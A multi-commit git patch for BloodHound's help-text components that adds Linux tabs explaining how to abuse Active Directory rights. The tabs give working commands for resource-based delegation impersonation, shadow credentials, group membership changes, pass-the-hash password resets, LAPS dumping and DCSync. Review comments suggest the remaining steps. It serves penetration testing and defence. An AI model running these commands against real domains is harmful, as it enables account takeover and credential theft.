From f4b5becf897a5d204e4fa2f1adf5bed9b1873d97 Mon Sep 17 00:00:00 2001 From: Shutdown Date: Mon, 19 Dec 2022 13:57:51 +0100 Subject: [PATCH 01/32] AddAllowedToAct Linux abuse --- .../AddAllowedToAct/AddAllowedToAct.jsx | 14 ++++--- .../HelpTexts/AddAllowedToAct/LinuxAbuse.jsx | 42 +++++++++++++++++++ .../{Abuse.jsx => WindowsAbuse.jsx} | 4 +- 3 files changed, 53 insertions(+), 7 deletions(-) create mode 100644 src/components/Modals/HelpTexts/AddAllowedToAct/LinuxAbuse.jsx rename src/components/Modals/HelpTexts/AddAllowedToAct/{Abuse.jsx => WindowsAbuse.jsx} (98%) diff --git a/src/components/Modals/HelpTexts/AddAllowedToAct/AddAllowedToAct.jsx b/src/components/Modals/HelpTexts/AddAllowedToAct/AddAllowedToAct.jsx index 2bfc53f00..ad1157805 100644 --- a/src/components/Modals/HelpTexts/AddAllowedToAct/AddAllowedToAct.jsx +++ b/src/components/Modals/HelpTexts/AddAllowedToAct/AddAllowedToAct.jsx @@ -2,7 +2,8 @@ import React from 'react'; import PropTypes from 'prop-types'; import { Tabs, Tab } from 'react-bootstrap'; import General from './General'; -import Abuse from './Abuse'; +import WindowsAbuse from './WindowsAbuse'; +import LinuxAbuse from './LinuxAbuse'; import Opsec from './Opsec'; import References from './References'; @@ -21,13 +22,16 @@ const AddAllowedToAct = ({ targetName={targetName} /> - - + + - + + + + - + diff --git a/src/components/Modals/HelpTexts/AddAllowedToAct/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/AddAllowedToAct/LinuxAbuse.jsx new file mode 100644 index 000000000..f4469cda1 --- /dev/null +++ b/src/components/Modals/HelpTexts/AddAllowedToAct/LinuxAbuse.jsx @@ -0,0 +1,42 @@ +import React from 'react'; + +const LinuxAbuse = () => { + return ( + <> + First, if an attacker does not control an account with an + SPN set, a new attacker-controlled computer account can be + added with Impacket's addcomputer.py example script: +
+                
+                    {
+                        "addcomputer.py -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host $DomainController -domain-netbios $DOMAIN 'domain/user:password'"
+                    }
+                
+            
+ We now need to configure the target object so that the attacker-controlled + computer can delegate to it. Impacket's rbcd.py script can be used for that + purpose: +
+                
+                    {
+                        "rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'TargetComputer' -action 'write' 'domain/user:password'"
+                    }
+                
+            
+ And finally we can get a service ticket for the service name (sname) we + want to "pretend" to be "admin" for. Impacket's getST.py example script + can be used for that purpose. +
+                
+                    {
+                        "getST.py -spn 'cifs/targetcomputer.testlab.local' -impersonate 'admin' 'domain/attackersystem$:Summer2018!'"
+                    }
+                
+            
+ This ticket can then be used with Pass-the-Ticket, and could grant access + to the file system of the TARGETCOMPUTER. + + ); +}; + +export default LinuxAbuse; diff --git a/src/components/Modals/HelpTexts/AddAllowedToAct/Abuse.jsx b/src/components/Modals/HelpTexts/AddAllowedToAct/WindowsAbuse.jsx similarity index 98% rename from src/components/Modals/HelpTexts/AddAllowedToAct/Abuse.jsx rename to src/components/Modals/HelpTexts/AddAllowedToAct/WindowsAbuse.jsx index 457a02870..35951ce45 100644 --- a/src/components/Modals/HelpTexts/AddAllowedToAct/Abuse.jsx +++ b/src/components/Modals/HelpTexts/AddAllowedToAct/WindowsAbuse.jsx @@ -1,6 +1,6 @@ import React from 'react'; -const Abuse = () => { +const WindowsAbuse = () => { return ( <> Abusing this primitive is currently only possible through the Rubeus @@ -62,4 +62,4 @@ const Abuse = () => { ); }; -export default Abuse; +export default WindowsAbuse; From b88e29c1aad9b5fa6650ce1cb28a20955f425dfb Mon Sep 17 00:00:00 2001 From: Shutdown Date: Mon, 19 Dec 2022 14:06:51 +0100 Subject: [PATCH 02/32] Adding references for AddAllowedToAct --- .../Modals/HelpTexts/AddAllowedToAct/References.jsx | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/src/components/Modals/HelpTexts/AddAllowedToAct/References.jsx b/src/components/Modals/HelpTexts/AddAllowedToAct/References.jsx index fd36e6918..e839d9ec7 100644 --- a/src/components/Modals/HelpTexts/AddAllowedToAct/References.jsx +++ b/src/components/Modals/HelpTexts/AddAllowedToAct/References.jsx @@ -26,6 +26,14 @@ const References = () => { https://github.com/Kevin-Robertson/Powermad#new-machineaccount +
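Review bot: The closing paragraph of LinuxAbuse stops at "Pass-the-Ticket" without saying how the ticket produced by getST.py is consumed, which is the step a Linux reader needs most: getST.py writes a `.ccache` file, so the tab should end with something like `export KRB5CCNAME=<ticket>.ccache` followed by an Impacket script invoked with `-k -no-pass` against `targetcomputer.testlab.local`. The addcomputer.py step silently depends on ms-DS-MachineAccountQuota being above 0 for the controlled user and leaves a new computer object in the domain; the linked machineaccountquota reference covers the first point, but the paragraph should state both so the reader knows when the step is unavailable and what to clean up. The rbcd.py example passes `-delegate-to 'TargetComputer'` while the rest of the tab targets a computer account; rbcd.py takes sAMAccountNames, so this presumably needs the trailing `$` (`-delegate-to 'TargetComputer$'`) to match the getST.py line. S4U2self for `admin` also fails when that account is in Protected Users or marked "sensitive and cannot be delegated", which is worth a one-line caveat next to the getST.py example.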
+ + https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd + +
+ + https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota + ); }; From 8f1584303be30083218695f9e263526da3afc265 Mon Sep 17 00:00:00 2001 From: Shutdown Date: Mon, 19 Dec 2022 14:14:14 +0100 Subject: [PATCH 03/32] AddKeyCredentialLink Linux abuse --- .../AddKeyCredentialLink.jsx | 14 +++++---- .../AddKeyCredentialLink/LinuxAbuse.jsx | 29 +++++++++++++++++++ .../{Abuse.jsx => WindowsAbuse.jsx} | 8 ++--- 3 files changed, 42 insertions(+), 9 deletions(-) create mode 100644 src/components/Modals/HelpTexts/AddKeyCredentialLink/LinuxAbuse.jsx rename src/components/Modals/HelpTexts/AddKeyCredentialLink/{Abuse.jsx => WindowsAbuse.jsx} (81%) diff --git a/src/components/Modals/HelpTexts/AddKeyCredentialLink/AddKeyCredentialLink.jsx b/src/components/Modals/HelpTexts/AddKeyCredentialLink/AddKeyCredentialLink.jsx index 459921777..837344054 100644 --- a/src/components/Modals/HelpTexts/AddKeyCredentialLink/AddKeyCredentialLink.jsx +++ b/src/components/Modals/HelpTexts/AddKeyCredentialLink/AddKeyCredentialLink.jsx @@ -2,7 +2,8 @@ import React from 'react'; import PropTypes from 'prop-types'; import { Tabs, Tab } from 'react-bootstrap'; import General from './General'; -import Abuse from './Abuse'; +import WindowsAbuse from './WindowsAbuse'; +import LinuxAbuse from './LinuxAbuse'; import Opsec from './Opsec'; import References from './References'; @@ -21,13 +22,16 @@ const AddKeyCredentialLink = ({ targetName={targetName} />
- - + + - + + + + - + diff --git a/src/components/Modals/HelpTexts/AddKeyCredentialLink/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/AddKeyCredentialLink/LinuxAbuse.jsx new file mode 100644 index 000000000..d4ce8d1ea --- /dev/null +++ b/src/components/Modals/HelpTexts/AddKeyCredentialLink/LinuxAbuse.jsx @@ -0,0 +1,29 @@ +import React from 'react'; +import PropTypes from 'prop-types'; + +const LinuxAbuse = ({ sourceName, sourceType }) => { + return ( + <> +

To abuse this privilege, use + + pyWhisker + + .

+ +
+                {'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}
+            
+ +

+ For other optional parameters, view the pyWhisker documentation. +

+ + ); +}; + +LinuxAbuse.propTypes = { + sourceName: PropTypes.string, + sourceType: PropTypes.string, +}; + +export default LinuxAbuse; diff --git a/src/components/Modals/HelpTexts/AddKeyCredentialLink/Abuse.jsx b/src/components/Modals/HelpTexts/AddKeyCredentialLink/WindowsAbuse.jsx similarity index 81% rename from src/components/Modals/HelpTexts/AddKeyCredentialLink/Abuse.jsx rename to src/components/Modals/HelpTexts/AddKeyCredentialLink/WindowsAbuse.jsx index 4774cf35b..6e18f5337 100644 --- a/src/components/Modals/HelpTexts/AddKeyCredentialLink/Abuse.jsx +++ b/src/components/Modals/HelpTexts/AddKeyCredentialLink/WindowsAbuse.jsx @@ -1,7 +1,7 @@ import React from 'react'; import PropTypes from 'prop-types'; -const Abuse = ({ sourceName, sourceType }) => { +const WindowsAbuse = ({ sourceName, sourceType }) => { return ( <>
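Review bot: The pyWhisker example stops at `--action "add"`, which only stores a new KeyCredential on the target; the step that actually yields a usable credential is missing, so the tab should continue with PKINIT using the PFX and password pyWhisker prints (e.g. PKINITtools' `gettgtpkinit.py` to obtain a TGT, then `getnthash.py` to recover the target's NT hash). That PKINIT step needs a domain controller with a certificate suitable for Kerberos authentication (typically AD CS present in the forest); without it the TGT request fails with KDC_ERR_PADATA_TYPE_NOSUPP, and the reader should know this before modifying msDS-KeyCredentialLink. The added key persists on the target, so a `--action "remove"` hint for cleanup belongs here or in the Opsec tab. Finally, `sourceName` and `sourceType` are destructured and declared in propTypes but never rendered; either use them in the example (`-u "{sourceName}"`) or drop them as the Windows tab's interface allows.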

To abuse this privilege, use Whisker.

@@ -18,15 +18,15 @@ const Abuse = ({ sourceName, sourceType }) => {

- For other optional parameters, view the Whisper documentation. + For other optional parameters, view the Whisker documentation.

); }; -Abuse.propTypes = { +WindowsAbuse.propTypes = { sourceName: PropTypes.string, sourceType: PropTypes.string, }; -export default Abuse; +export default WindowsAbuse; From f99e4c0cceb2b460723ece767cca8163aa003119 Mon Sep 17 00:00:00 2001 From: Shutdown Date: Mon, 19 Dec 2022 14:25:34 +0100 Subject: [PATCH 04/32] AddMember Linux abuse --- .../Modals/HelpTexts/AddMember/AddMember.jsx | 14 +++-- .../Modals/HelpTexts/AddMember/LinuxAbuse.jsx | 55 +++++++++++++++++++ .../Modals/HelpTexts/AddMember/References.jsx | 4 ++ .../AddMember/{Abuse.jsx => WindowsAbuse.jsx} | 6 +- 4 files changed, 71 insertions(+), 8 deletions(-) create mode 100644 src/components/Modals/HelpTexts/AddMember/LinuxAbuse.jsx rename src/components/Modals/HelpTexts/AddMember/{Abuse.jsx => WindowsAbuse.jsx} (96%) diff --git a/src/components/Modals/HelpTexts/AddMember/AddMember.jsx b/src/components/Modals/HelpTexts/AddMember/AddMember.jsx index 8ee328de4..59a751a63 100644 --- a/src/components/Modals/HelpTexts/AddMember/AddMember.jsx +++ b/src/components/Modals/HelpTexts/AddMember/AddMember.jsx @@ -2,7 +2,8 @@ import React from 'react'; import PropTypes from 'prop-types'; import { Tabs, Tab } from 'react-bootstrap'; import General from './General'; -import Abuse from './Abuse'; +import WindowsAbuse from './WindowsAbuse'; +import LinuxAbuse from './LinuxAbuse'; import Opsec from './Opsec'; import References from './References'; @@ -16,13 +17,16 @@ const AddMember = ({ sourceName, sourceType, targetName, targetType }) => { targetName={targetName} />
- - + + - + + + + - + diff --git a/src/components/Modals/HelpTexts/AddMember/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/AddMember/LinuxAbuse.jsx new file mode 100644 index 000000000..0b8348dee --- /dev/null +++ b/src/components/Modals/HelpTexts/AddMember/LinuxAbuse.jsx @@ -0,0 +1,55 @@ +import React from 'react'; +import PropTypes from "prop-types"; + +const LinuxAbuse = ({ sourceName, sourceType }) => { + return ( + <> +

+ Use samba's net tool to add the user to the target group. The credentials can be supplied in cleartext + or prompted interactively if omitted from the command line: +

+ +
+                
+                    {
+                        'net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                    }
+                
+            
+ +

+ Pass-the-hash can also be done here with + + pth-toolkit's net tool + . If the LM hash is not known it must be replace with ffffffffffffffffffffffffffffffff. +

+ +
+                
+                    {
+                        'pth-net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                    }
+                
+            
+ +

+ Finally, verify that the user was successfully added to the group: +

+ +
+                
+                    {
+                        'net rpc group members "TargetGroup" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                    }
+                
+            
+ + ); +}; + +LinuxAbuse.propTypes= { + sourceName: PropTypes.string, + sourceType: PropTypes.string +} + +export default LinuxAbuse; diff --git a/src/components/Modals/HelpTexts/AddMember/References.jsx b/src/components/Modals/HelpTexts/AddMember/References.jsx index 49fd24921..1134cb825 100644 --- a/src/components/Modals/HelpTexts/AddMember/References.jsx +++ b/src/components/Modals/HelpTexts/AddMember/References.jsx @@ -14,6 +14,10 @@ const References = () => { https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728 +
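Review bot: The pass-the-hash paragraph reads `If the LM hash is not known it must be replace with ffffffffffffffffffffffffffffffff.`, which should be `replaced`, and the paragraph is repeated verbatim in later commits of this series so the fix should be applied to every copy. `LinuxAbuse` destructures `sourceName` and `sourceType` and declares them in propTypes but never renders either, so either substitute `{sourceName}` for `"ControlledUser"` in the examples or remove the unused props. pth-toolkit's `pth-net` is an old, unmaintained fork; recent samba `net` builds accept an NT hash directly with `--pw-nt-hash` (`net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"NThash" --pw-nt-hash -S "DomainController"`), which is worth offering first and would also drop the LM-hash placeholder sentence.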
+ + https://www.thehacker.recipes/ad/movement/dacl/addmember + ); }; diff --git a/src/components/Modals/HelpTexts/AddMember/Abuse.jsx b/src/components/Modals/HelpTexts/AddMember/WindowsAbuse.jsx similarity index 96% rename from src/components/Modals/HelpTexts/AddMember/Abuse.jsx rename to src/components/Modals/HelpTexts/AddMember/WindowsAbuse.jsx index d67657fc8..6c03bcc87 100644 --- a/src/components/Modals/HelpTexts/AddMember/Abuse.jsx +++ b/src/components/Modals/HelpTexts/AddMember/WindowsAbuse.jsx @@ -1,7 +1,7 @@ import React from 'react'; import PropTypes from "prop-types"; -const Abuse = ({ sourceName, sourceType }) => { +const WindowsAbuse = ({ sourceName, sourceType }) => { return ( <>

@@ -66,9 +66,9 @@ const Abuse = ({ sourceName, sourceType }) => { ); }; -Abuse.propTypes= { +WindowsAbuse.propTypes= { sourceName: PropTypes.string, sourceType: PropTypes.string } -export default Abuse; +export default WindowsAbuse; From b0568533887b4cecdd45e178b31ab7aa5618e60a Mon Sep 17 00:00:00 2001 From: Shutdown Date: Mon, 19 Dec 2022 14:30:04 +0100 Subject: [PATCH 05/32] Fixing missing space with links --- .../Modals/HelpTexts/AddKeyCredentialLink/LinuxAbuse.jsx | 6 +----- src/components/Modals/HelpTexts/AddMember/LinuxAbuse.jsx | 6 ++---- 2 files changed, 3 insertions(+), 9 deletions(-) diff --git a/src/components/Modals/HelpTexts/AddKeyCredentialLink/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/AddKeyCredentialLink/LinuxAbuse.jsx index d4ce8d1ea..a1a3305bc 100644 --- a/src/components/Modals/HelpTexts/AddKeyCredentialLink/LinuxAbuse.jsx +++ b/src/components/Modals/HelpTexts/AddKeyCredentialLink/LinuxAbuse.jsx @@ -4,11 +4,7 @@ import PropTypes from 'prop-types'; const LinuxAbuse = ({ sourceName, sourceType }) => { return ( <> -

To abuse this privilege, use - - pyWhisker - - .

+

To abuse this privilege, use pyWhisker.

                 {'pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"'}
diff --git a/src/components/Modals/HelpTexts/AddMember/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/AddMember/LinuxAbuse.jsx
index 0b8348dee..cb69fd29f 100644
--- a/src/components/Modals/HelpTexts/AddMember/LinuxAbuse.jsx
+++ b/src/components/Modals/HelpTexts/AddMember/LinuxAbuse.jsx
@@ -18,10 +18,8 @@ const LinuxAbuse = ({ sourceName, sourceType }) => {
             

- Pass-the-hash can also be done here with - - pth-toolkit's net tool - . If the LM hash is not known it must be replace with ffffffffffffffffffffffffffffffff. + Pass-the-hash can also be done here with pth-toolkit's net tool. + If the LM hash is not known it must be replace with ffffffffffffffffffffffffffffffff.


From b73c2b31bcf6b86eb3b7069571c4566da87f191a Mon Sep 17 00:00:00 2001
From: Shutdown 
Date: Mon, 19 Dec 2022 14:36:18 +0100
Subject: [PATCH 06/32] AddSelf Linux abuse

---
 .../Modals/HelpTexts/AddSelf/AddSelf.jsx      | 14 +++--
 .../Modals/HelpTexts/AddSelf/LinuxAbuse.jsx   | 53 +++++++++++++++++++
 .../Modals/HelpTexts/AddSelf/References.jsx   |  8 +++
 .../AddSelf/{Abuse.jsx => WindowsAbuse.jsx}   |  6 +--
 4 files changed, 73 insertions(+), 8 deletions(-)
 create mode 100644 src/components/Modals/HelpTexts/AddSelf/LinuxAbuse.jsx
 rename src/components/Modals/HelpTexts/AddSelf/{Abuse.jsx => WindowsAbuse.jsx} (96%)

diff --git a/src/components/Modals/HelpTexts/AddSelf/AddSelf.jsx b/src/components/Modals/HelpTexts/AddSelf/AddSelf.jsx
index 7b6dbd52c..0c6c3c882 100644
--- a/src/components/Modals/HelpTexts/AddSelf/AddSelf.jsx
+++ b/src/components/Modals/HelpTexts/AddSelf/AddSelf.jsx
@@ -2,7 +2,8 @@ import React from 'react';
 import PropTypes from 'prop-types';
 import { Tabs, Tab } from 'react-bootstrap';
 import General from './General';
-import Abuse from './Abuse';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
 import Opsec from './Opsec';
 import References from './References';
 
@@ -16,13 +17,16 @@ const AddSelf = ({ sourceName, sourceType, targetName, targetType }) => {
                     targetName={targetName}
                 />
             
-            
-                
+            
+                
             
-            
+            
+                
+            
+            
                 
             
-            
+            
                 
             
         
diff --git a/src/components/Modals/HelpTexts/AddSelf/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/AddSelf/LinuxAbuse.jsx
new file mode 100644
index 000000000..cb69fd29f
--- /dev/null
+++ b/src/components/Modals/HelpTexts/AddSelf/LinuxAbuse.jsx
@@ -0,0 +1,53 @@
+import React from 'react';
+import PropTypes from "prop-types";
+
+const LinuxAbuse = ({ sourceName, sourceType }) => {
+    return (
+        <>
+            

+ Use samba's net tool to add the user to the target group. The credentials can be supplied in cleartext + or prompted interactively if omitted from the command line: +

+ +
+                
+                    {
+                        'net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                    }
+                
+            
+ +

+ Pass-the-hash can also be done here with pth-toolkit's net tool. + If the LM hash is not known it must be replace with ffffffffffffffffffffffffffffffff. +

+ +
+                
+                    {
+                        'pth-net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                    }
+                
+            
+ +

+ Finally, verify that the user was successfully added to the group: +

+ +
+                
+                    {
+                        'net rpc group members "TargetGroup" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                    }
+                
+            
+ + ); +}; + +LinuxAbuse.propTypes= { + sourceName: PropTypes.string, + sourceType: PropTypes.string +} + +export default LinuxAbuse; diff --git a/src/components/Modals/HelpTexts/AddSelf/References.jsx b/src/components/Modals/HelpTexts/AddSelf/References.jsx index 49fd24921..000345dd8 100644 --- a/src/components/Modals/HelpTexts/AddSelf/References.jsx +++ b/src/components/Modals/HelpTexts/AddSelf/References.jsx @@ -14,6 +14,14 @@ const References = () => { https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728 +
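Review bot: This LinuxAbuse is byte-identical to AddMember's (both resolve to blob cb69fd29f, see the `index` lines of this hunk and of the earlier AddMember fix), but AddSelf is BloodHound's name for the Self right on the member attribute, under which the controlled principal can only add itself to the group; the example `net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"Password"` will be refused for any `TargetUser` other than `ControlledUser`, and the intro sentence "add the user to the target group" hides that restriction. Change the member argument to the controlled account in all three commands (e.g. `net rpc group addmem "TargetGroup" "ControlledUser" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"`) and say explicitly that the account adds itself, so the text presumably matches the General tab's description of the edge. The typo `must be replace with` carried over from AddMember should become `replaced` here as well.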
+ + https://www.thehacker.recipes/ad/movement/dacl/addmember + +
+ + https://www.thehacker.recipes/ad/movement/dacl#bloodhound-edges + ); }; diff --git a/src/components/Modals/HelpTexts/AddSelf/Abuse.jsx b/src/components/Modals/HelpTexts/AddSelf/WindowsAbuse.jsx similarity index 96% rename from src/components/Modals/HelpTexts/AddSelf/Abuse.jsx rename to src/components/Modals/HelpTexts/AddSelf/WindowsAbuse.jsx index 5256d5ff0..0321e81b6 100644 --- a/src/components/Modals/HelpTexts/AddSelf/Abuse.jsx +++ b/src/components/Modals/HelpTexts/AddSelf/WindowsAbuse.jsx @@ -1,7 +1,7 @@ import React from 'react'; import PropTypes from 'prop-types'; -const Abuse = ({ sourceName, sourceType }) => { +const WindowsAbuse = ({ sourceName, sourceType }) => { return ( <>

@@ -66,9 +66,9 @@ const Abuse = ({ sourceName, sourceType }) => { ); }; -Abuse.propTypes = { +WindowsAbuse.propTypes = { sourceName: PropTypes.string, sourceType: PropTypes.string, }; -export default Abuse; +export default WindowsAbuse; From a45e6d717d5b80ff756b9f945a5bbefdb1cfcf04 Mon Sep 17 00:00:00 2001 From: Shutdown Date: Mon, 19 Dec 2022 14:40:46 +0100 Subject: [PATCH 07/32] Adding other UNIX-like tools to AdminTo --- src/components/Modals/HelpTexts/AdminTo/Abuse.jsx | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/src/components/Modals/HelpTexts/AdminTo/Abuse.jsx b/src/components/Modals/HelpTexts/AdminTo/Abuse.jsx index 09bb60d4d..69fa82aca 100644 --- a/src/components/Modals/HelpTexts/AdminTo/Abuse.jsx +++ b/src/components/Modals/HelpTexts/AdminTo/Abuse.jsx @@ -12,7 +12,10 @@ const Abuse = () => { Invoke-SMBExec. With Metasploit, consider the modules "exploit/windows/smb/psexec", "exploit/windows/winrm/winrm_script_exec", and - "exploit/windows/local/ps_wmi_exec". Additionally, there are + "exploit/windows/local/ps_wmi_exec". + With Impacket, consider the example scripts + psexec/wmiexec/smbexec/atexec/dcomexec. There are other alternatives + like evil-winrm and crackmapexec. Additionally, there are several manual methods for remotely executing code on the machine, including via RDP, with the service control binary and interaction with the remote machine's service control manager, From 6ea097b8e38ee210927a770f88c50eba0068813c Mon Sep 17 00:00:00 2001 
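Review bot: The new sentence lists `psexec/wmiexec/smbexec/atexec/dcomexec` as interchangeable, but their footprint on the target differs in a way the reader choosing one should know: psexec.py uploads a binary to a writable share and registers a service, smbexec.py creates a service for each command, while wmiexec.py, dcomexec.py and atexec.py create no service (they still write command output to a share or temporary file). A half-sentence such as `(wmiexec/dcomexec/atexec avoid creating a service; see the Opsec tab)` would make the trade-off explicit, assuming the AdminTo modal has an Opsec tab like its siblings. evil-winrm additionally requires the WinRM listener (5985/5986) to be reachable, which is a different prerequisite from the SMB port the other tools need and is worth stating.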
From: Shutdown Date: Mon, 19 Dec 2022 16:32:07 +0100 Subject: [PATCH 08/32] AllExtendedRights Linux abuse --- .../AllExtendedRights/AllExtendedRights.jsx | 20 ++- .../AllExtendedRights/LinuxAbuse.jsx | 133 ++++++++++++++++++ .../AllExtendedRights/References.jsx | 16 +++ .../{Abuse.jsx => WindowsAbuse.jsx} | 6 +- 4 files changed, 167 insertions(+), 8 deletions(-) create mode 100644 src/components/Modals/HelpTexts/AllExtendedRights/LinuxAbuse.jsx rename src/components/Modals/HelpTexts/AllExtendedRights/{Abuse.jsx => WindowsAbuse.jsx} (97%) diff --git a/src/components/Modals/HelpTexts/AllExtendedRights/AllExtendedRights.jsx b/src/components/Modals/HelpTexts/AllExtendedRights/AllExtendedRights.jsx index f7c5189da..415ae1fe3 100644 --- a/src/components/Modals/HelpTexts/AllExtendedRights/AllExtendedRights.jsx +++ b/src/components/Modals/HelpTexts/AllExtendedRights/AllExtendedRights.jsx @@ -2,7 +2,8 @@ import React from 'react'; import PropTypes from 'prop-types'; import { Tabs, Tab } from 'react-bootstrap'; import General from './General'; -import Abuse from './Abuse'; +import WindowsAbuse from './WindowsAbuse'; +import LinuxAbuse from './LinuxAbuse'; import Opsec from './Opsec'; import References from './References'; @@ -23,8 +24,8 @@ const AllExtendedRights = ({ targetType={targetType} /> - - + - + + + + - + diff --git a/src/components/Modals/HelpTexts/AllExtendedRights/LinuxAbuse.jsx b/src/components/Modals/HelpTexts/AllExtendedRights/LinuxAbuse.jsx new file mode 100644 index 000000000..18465a52c --- /dev/null +++ b/src/components/Modals/HelpTexts/AllExtendedRights/LinuxAbuse.jsx @@ -0,0 +1,133 @@ +import React from 'react'; +import PropTypes from 'prop-types'; + +const LinuxAbuse = ({ sourceName, sourceType, targetName, targetType, haslaps }) => { + switch (targetType) { + case 'User': + return ( + <> +

+ The AllExtendedRights privilege grants {sourceName} the + ability to change the password of the user {targetName}{' '} + without knowing their current password. This is + equivalent to the "ForceChangePassword" edge in + BloodHound. +

+ +

+ Use samba's net tool to change the user's password. The credentials can be supplied in cleartext + or prompted interactively if omitted from the command line. The new password will be prompted + if omitted from the command line. +

+ +
+                        
+                            {
+                                'net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"'
+                            }
+                        
+                    
+ +

+ Pass-the-hash can also be done here with pth-toolkit's net tool. + If the LM hash is not known it must be replace with ffffffffffffffffffffffffffffffff. +

+ +
+                        
+                            {
+                                'pth-net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"'
+                            }
+                        
+                    
+ + ); + case 'Computer': + if (haslaps) + return ( + <> +

+ The AllExtendedRights privilege grants {sourceName} the + ability to obtain the RID 500 administrator password of{' '} + {targetName}. {sourceName} can do so by listing a + computer object's AD properties with PowerView using + Get-DomainComputer {targetName}. The value of the + ms-mcs-AdmPwd property will contain password of the + administrative local account on {targetName}. +

+ +

+ LAPSDumper can be used + to retrieve LAPS passwords: +

+ +
+                            
+                                {
+                                    'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                                }
+                            
+                        
+ + ); + else + return ( +

+ This ACE is not exploitable under current conditions. + Please report this bug to the BloodHound developers +

+ ); + case 'Domain': + return ( + <> +

+ The AllExtendedRights privilege grants {sourceName} both the + DS-Replication-Get-Changes and + DS-Replication-Get-Changes-All privileges, which combined + allow a principal to replicate objects from the domain{' '} + {targetName}. +

+ +

+ This can be abused using Impacket's secretsdump.py example script: +

+ +
+                            
+                                {
+                                    "secretsdump 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'"
+                                }
+                            
+                    
+ +

+ The AllExtendedRights privilege also grants {sourceName} enough{' '} + privileges, to retrieve LAPS passwords domain-wise. +

+ +

+ LAPSDumper can be used + for that purpose: +

+ +
+                        
+                            {
+                                'laps.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"'
+                            }
+                        
+                    
+ + ); + } +}; + +LinuxAbuse.propTypes = { + sourceName: PropTypes.string, + sourceType: PropTypes.string, + targetName: PropTypes.string, + targetType: PropTypes.string, + haslaps: PropTypes.bool +} + +export default LinuxAbuse; diff --git a/src/components/Modals/HelpTexts/AllExtendedRights/References.jsx b/src/components/Modals/HelpTexts/AllExtendedRights/References.jsx index 55d10585d..e2f2159f1 100644 --- a/src/components/Modals/HelpTexts/AllExtendedRights/References.jsx +++ b/src/components/Modals/HelpTexts/AllExtendedRights/References.jsx @@ -10,6 +10,22 @@ const References = () => { https://www.youtube.com/watch?v=z8thoG7gPd0 +
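Review bot: The `Domain` branch's `secretsdump 'DOMAIN'/'USER':'PASSWORD'@'DOMAINCONTROLLER'` should carry `-just-dc` (or `-just-dc-ntlm`): with only the two replication rights this edge grants, secretsdump.py's default mode also attempts the SAM/LSA/DPAPI dumps through remote registry, which need local admin on the DC and will fail noisily before or after the DCSync part. The `Computer` branch with `haslaps` still tells the reader to run PowerView's `Get-DomainComputer {targetName}`, which is a Windows instruction left over from the copied tab and should be replaced by the LDAP read the Linux tools do (the `laps.py` call below it, ideally restricted to `{targetName}` if LAPSDumper offers a computer filter). `retrieve LAPS passwords domain-wise` should read `domain-wide`. The `switch (targetType)` has no `default`, so any other target type makes the component return `undefined`; this presumably mirrors WindowsAbuse, but a `default: return null;` would be the safer shape for a function component.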
+ + https://www.youtube.com/watch?v=z8thoG7gPd0 + +
+ + https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword + +
+ + https://www.thehacker.recipes/ad/movement/dacl/readlapspassword + +
+ + https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync + ); }; diff --git a/src/components/Modals/HelpTexts/AllExtendedRights/Abuse.jsx b/src/components/Modals/HelpTexts/AllExtendedRights/WindowsAbuse.jsx similarity index 97% rename from src/components/Modals/HelpTexts/AllExtendedRights/Abuse.jsx rename to src/components/Modals/HelpTexts/AllExtendedRights/WindowsAbuse.jsx index 00b598c49..fd6edf4c3 100644 --- a/src/components/Modals/HelpTexts/AllExtendedRights/Abuse.jsx +++ b/src/components/Modals/HelpTexts/AllExtendedRights/WindowsAbuse.jsx @@ -1,7 +1,7 @@ import React from 'react'; import PropTypes from 'prop-types'; -const Abuse = ({ sourceName, sourceType, targetName, targetType, haslaps }) => { +const WindowsAbuse = ({ sourceName, sourceType, targetName, targetType, haslaps }) => { switch (targetType) { case 'User': return ( @@ -122,7 +122,7 @@ const Abuse = ({ sourceName, sourceType, targetName, targetType, haslaps }) => { } }; -Abuse.propTypes = { +WindowsAbuse.propTypes = { sourceName: PropTypes.string, sourceType: PropTypes.string, targetName: PropTypes.string, @@ -130,4 +130,4 @@ Abuse.propTypes = { haslaps: PropTypes.bool } -export default Abuse; +export default WindowsAbuse; From 